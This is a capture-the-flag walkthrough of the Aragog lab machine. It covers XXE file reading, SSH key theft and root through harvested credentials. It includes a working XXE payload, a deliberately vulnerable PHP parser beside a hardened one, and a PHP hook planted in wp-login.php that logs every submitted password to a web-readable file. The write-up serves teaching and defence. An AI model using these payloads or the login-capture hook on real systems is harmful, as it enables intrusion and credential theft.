# Aragog

## Aragog - 10.10.10.78

### Target Enumeration:

OS: Linux

IP: 10.10.10.78

User: f43bdfbcfd3f2a955a7b67c7a6e21359

Root: 9a9da52d7aad358699a96a5754595de6

### Vulnerability Exploited:

XML External Entity (XXE) injection in hosts.php gives arbitrary file read: first /etc/passwd to learn the usernames, then florian's id_rsa key.

### Privilege Escalation:

A scripted login to the WordPress application submits credentials in plaintext that are also the root password; modifying wp-login.php to dump submitted passwords to disk captures them.

### Exploiting the host:

Nmap

![](https://lh4.googleusercontent.com/WKoL1EPUV8k9shpc_x_nYF9ty5XgftD10QkGjeosc0g01RB-cWMrvIM_lnCzfJ55ru9zKrruKIhMQgRCrE6Oh2oc8tWwKUqNglpV0fcNfRUNQfO_ESnwT4ReV4El1f4W7CePZWJn)

Dirbuster

![](https://lh5.googleusercontent.com/Jw9dIlu80uKLcZVs93ZsC0bSsEKhDcS1rj9LY3nJgdDF5v_tls1TBZvkZxvzNFMsadtmkoVadVJrIEPVA2oj7hq4kqGL2WuqRqBCEvGPSgFwt8cdYZsMpBSn5iZTgD7M8S1tw5FV)

hosts.php

![](https://lh5.googleusercontent.com/wKQLEEutg_5CRFUcpZyJH4N3MuHjbOOp7hS2GhIDD-MX-6GVmUoYXF3wSpGNTH4_MQJobAmewI8h3g4oQSfWR2towlDG-SKgQB9qDinn2VLd_iTitUlIY3hHJGkdvuJ5_lcS16Xr)

This is a strange request, so build a POST request to /hosts.php and test for XML external entity injection; the parser resolves external entities, so it can be used to read local files off the box.

<div align="left"><img src="https://lh6.googleusercontent.com/kdo4bs9nOmVQE0ggalTGXHG08G7EE6yrJRNmxIfMcUadWywtGT7EonYax6lq92dzfUDHhNCMVBLwTei2WWBMpqCrFq_aONyHFWqKT-qwljeFs1qfQiZ4-PdxsSZcBrKzLVE94ede" alt=""></div>

Found the user.txt

![](https://lh4.googleusercontent.com/_Pv7iuLCGJB1AKZP-O9w7o6gEVs10DAqik_mhb1OTb8Ka04KLr1CTVWUn2XCFgC1QJaNhk9srny1t_NKAkJjdnfIJMkV19WLPEetMaQU6pnMDqng9QMg7R62hwWp66d_VlemdL_5)

f43bdfbcfd3f2a955a7b67c7a6e21359

Vulnerable code:

![](https://lh6.googleusercontent.com/8CLo3wJScq5tC6pZ7mz13KxmLKypV8OUUGGue2pkDoK436sIVxDBtm4D6uIZwY38y7YDibLke_xkcpfYZoDCoGWrx5LCn5pcEzG-At8rSu06__A9ViHlHzLLNsQ9yYuTUCKETAjj)
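Added example, not Aragog's real hosts.php: a simplexml handler in the style of the vulnerable code above, beside a hardened version, with the XXE payload that was sent in the Burp request. The element name subnet_mask, the response wording and the host arithmetic are assumptions; the bug itself (LIBXML_NOENT on untrusted XML) is the standard PHP XXE pattern.

```php
<?php
// Added example (not the page's or Aragog's own code): an XXE-prone simplexml
// handler beside a hardened one. <subnet_mask> and the response text are
// assumptions.

// Constructed attacker request: an internal DTD declares an external entity
// backed by a local file and references it in the element the app echoes.
// Swap the path for /home/florian/.ssh/id_rsa to pull the key instead.
$payload = <<<'XML'
<?xml version="1.0"?>
<!DOCTYPE details [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<details>
  <subnet_mask>&xxe;</subnet_mask>
  <test>test</test>
</details>
XML;

// Shared response formatting; the host count is a stand-in, not Aragog's.
function describe(string $mask): string
{
    return sprintf("There are %d possible hosts for %s\n",
        (2 ** (32 - (int) $mask)) - 2, $mask);
}

// VULNERABLE: LIBXML_NOENT asks libxml to substitute entity references, so the
// parser opens file:///etc/passwd and splices it into $xml->subnet_mask, which
// is then echoed straight back to the client.
function vulnerable(string $body): string
{
    $xml = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NOENT);
    if ($xml === false) {
        return "Invalid XML\n";
    }
    return describe((string) $xml->subnet_mask);
}

// HARDENED: refuse any document carrying a DOCTYPE (no DTD means no entity
// declarations), never pass LIBXML_NOENT, and validate the value before use.
// LIBXML_NONET only blocks network fetches, not file://, so it is a second
// layer rather than the fix.
function hardened(string $body): string
{
    libxml_use_internal_errors(true);            // keep parser errors off the page
    if (stripos($body, '<!DOCTYPE') !== false) {
        return "Invalid XML\n";
    }
    $xml = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);
    if ($xml === false) {
        return "Invalid XML\n";
    }
    $mask = trim((string) $xml->subnet_mask);
    if (!ctype_digit($mask) || (int) $mask > 32) {
        return "Invalid subnet mask\n";
    }
    return describe($mask);
}

echo vulnerable($payload);
echo hardened($payload);
```

Run it with `php` on any box with the SimpleXML extension: the first call prints the contents of /etc/passwd inside the "possible hosts" message, the second rejects the document before the parser ever sees the entity. The DOCTYPE check is deliberately done on the raw body rather than relying on parser flags, because the flag set that is "safe" has varied across libxml versions.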

Can't brute-force SSH as it does not allow password authentication.

Grab the ssh key file

![](https://lh5.googleusercontent.com/68-_pr86B-sHZbPuiq-TYCa8N0srHo602--6WywCGiIb5cN2iiBKF_VQVC2kmk46GCbzjCoyKVFAUUGK1DIOV96IjOea49ugzxmuspVNiIXU_pnwbNF0T6zNuAwITK9ucdHUbN7B)

Download the key, chmod 400 it and log in via SSH as florian, the user we found in /etc/passwd.

![](https://lh5.googleusercontent.com/SjnTJYQQ38jk5MR7SiY6yxf_69fCl1MPs_nEVPn8tNBA-FWI5xvuHFG3U1IXA0E7S0u9pq4Esw63v58AbKQGdsVQ64oNKy8YsL_0lDu4Wa2NYFuwM_fG1DvEZU0vDaxurMuDgoZK)

Bash history

![](https://lh4.googleusercontent.com/QWE2hCGVUWKivsdZFNi6q-HCM4DSO0o1dH7Q3eDUE52dUmQVJpqIzi5ueLD6GiZRLW7YRWwA8S2CByuwFudQioCOktvwW7AZsweykCCBAikvw8TbayEmcQOEseaDHkEv-mn0sKAy)

Mysql history

![](https://lh6.googleusercontent.com/Fxw1sDcHQ01HP_atYz-ZrvTB6aG97D_pj0qbUumN562bbvQVBJVPEDSrinGdN0PpxtUa5LUJ8Ie0elitxkcHBfZ1nM1e_ihvFmedyFVaH_smfOO4A-g-I9NaAZboAbgtP6KVZAlW)

Mysql password located in wp-config file

![](https://lh5.googleusercontent.com/0F5qrolAD10XX1k1ce_FYRjdVg9LNWoWKUvKLdF0kfOYafVYyCjIZKxDVepdCSkEa5yU3ABbXtYnHMVI6uJH9rrOzIK7k8x_l6zUSQsAvN7XAQloamoxeIYIb2nL2zr_1bQd-iZC)

This password gives you access to the mysql database

![](https://lh3.googleusercontent.com/DwbKsZ0I2pODEFCjv9FTCFQAHg30c4bv7PIjNsjrnX7SYTXfIvqvyLqr-d8PdznT5aUc0Ofk2a_eYig_zYNNbW8eUEN2KGbLRIHIDFWNmU09jfUgETwy00POOE-gc-dNAKGVbRcM)

Found admin hash

![](https://lh3.googleusercontent.com/Iu2Tlqf8qTGAPjmb-bFJdloywFfLTcaUX7-keerbQWq31YiDYhJdssJMog2qdfrf6l6UZYUvWl6Nhmt3NY5OXlG_i3wGs3TiicecvFPm-gbUQv4wM71LwiaJm4cxjR_Q4fk_ugn6)

Also found a comment from cliff to florian:

![](https://lh3.googleusercontent.com/FPrWaAQS6fTmPU4gwhtB52RUf3WYbA0HfXyh8q8JPM_99VmJ-IJIjIrvlU6BKndMk0lv4RcwjkemKel-f2LDx5YFAWHpXhmfT2v8RJqNDfeCcI4-gW28Eov9c4jgpOrX5ckDqea0)

Now we need to reach the web page, so forward it locally with ssh -L and browse to it (add 10.10.10.78 aragog to your hosts file so the WordPress redirect resolves).

![](https://lh6.googleusercontent.com/G97UurSPxlTCR2YSc-Fsa_hPzDSISmPp8OH4gSJd2HZC72wpfg0_0zUAiAf5NVQQkPjGRreRiah18mFHV2KXHSNObx0tlttVG5UvQOvli_uhu-6YybKHOfqXwd3MkIlv1_Phon7b)

Now you can visit the wordpress application

![](https://lh6.googleusercontent.com/ljbZffGVmLxwx2BnmcEyagBaMzkBLGweDo7PLQo7wWarrSpB5n1qSB-ZXWMmR3u897Sk_vQkd2WT1tP_F6K2pLTO0f764BfBkLUpgqDD7FtS5J5dPOu85htPsHuGSCsA8nKTPR_w)

We know from the database that the username is administrator, so let's see if there are any WordPress exploits.

WPScan doesn't bring anything back, and ultimately there is no way into the application from the outside.

Checking running processes every few seconds shows cliff running a Python script called wp-login.py.

![](https://lh6.googleusercontent.com/JT8jKEPEzI3B1l8WPo7hgSArpcOOwRE696UOmFJKNEQbtwDBnMoVayFwpbxZzJSbsGc15F1hnrN29n4f0OsRS_zPnRd_IC0H2TEQsFo0Orz_5fTDROtAZ12mVnjjWQEYokE-Dlby)

We can assume from this that he is logging into the application on a timer.

wp-login.php is writable by us, so add the following lines under the submit button:

![](https://lh6.googleusercontent.com/20xRARLZbcGat_hE8Ne_lO_Tnxjf-gLHT5PczqsOe68EurWhuuDODU4h5rHnVneb-r-gPD_KsX3WXoqmmDIAmmGU-gIyoA3ef9JPTfUMbl0phSA5lazOCkn4kJbHIIPeI0VEyTM_)
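The credential-capture hook, written out as an added example rather than the exact lines from the screenshot above. It relies only on wp-login.php being writable by our user; the field names log and pwd are WordPress's standard login form names, and the output file name matches the page's loginData.txt. It is wrapped in its own PHP tags so it works whether you paste it below the submit button, as the page does, or at the top of the file.

```php
<?php
// Added example (not the page's own snippet): append every login attempt that
// hits wp-login.php to a file in the web root. Assumes wp-login.php is
// writable by the current user; 'log' and 'pwd' are WordPress's standard
// login field names.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['log'], $_POST['pwd'])) {
    $line = sprintf("%s %s %s:%s\n",
        date('c'),                        // when the attempt happened
        $_SERVER['REMOTE_ADDR'] ?? '-',   // where it came from (127.0.0.1 for a local script)
        $_POST['log'],
        $_POST['pwd']);
    // Append under a lock so two concurrent logins cannot clobber each other;
    // the @ keeps a permissions error from breaking the real login page.
    @file_put_contents(__DIR__ . '/loginData.txt', $line, FILE_APPEND | LOCK_EX);
}
?>
```

The hook does not touch WordPress's own handling, so the script's login still succeeds and nothing looks broken from cliff's side. Remember the capture file lands in the web root and is readable over HTTP, so remove it and revert wp-login.php when done. From the defender's side, this is why the web root should not be writable by the account that runs interactive shells, why wp-login.php belongs under file-integrity monitoring, and why a service account's password should never double as the root password.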

Wait around a minute and loginData.txt will appear in the /var/www/html directory.

Cat the file and you will have credentials:

![](https://lh5.googleusercontent.com/nQxjd9sH6BJg44hhFksj6oMLnefvKyzPQSzthC37QdUHWpoqLc1Ey3Gd7WL62Kapgwk58MpqBsIvNHaUoulCi_TCvh-cJ_pf7Lugal4HkakEkYhGPr6djN5m4YfoZ75l5CMt4SSU)

Run su root to get a root shell with the password disclosed.

![](https://lh6.googleusercontent.com/VzJGlSAveo5PQiszQWyPyDGb77U2aPGg-ptGytprDR6r52He0dn06Ll24wVKO0TX5JO7iGNW4yVyi6k18dKmDLZnMYIsw3l6Ixb0CLpTP_FEqfWCW-qKJnVHFzThxOnXZnlQEzR1)

Vulnerable programs/scripts:

![](https://lh6.googleusercontent.com/tUVmYY_g5bKQDc7Xm-CUSdgi9xVVJCyJn69UTFGbkznZyHWR5b4YWWrU_zYHLM5FIDxWiP4PHWL0IwXlJsjLf7hqG8Nm7s3qUI60I1SH_kP4aj9mqbS6RH5qhYGbAsFUsbqZ8Pmk)
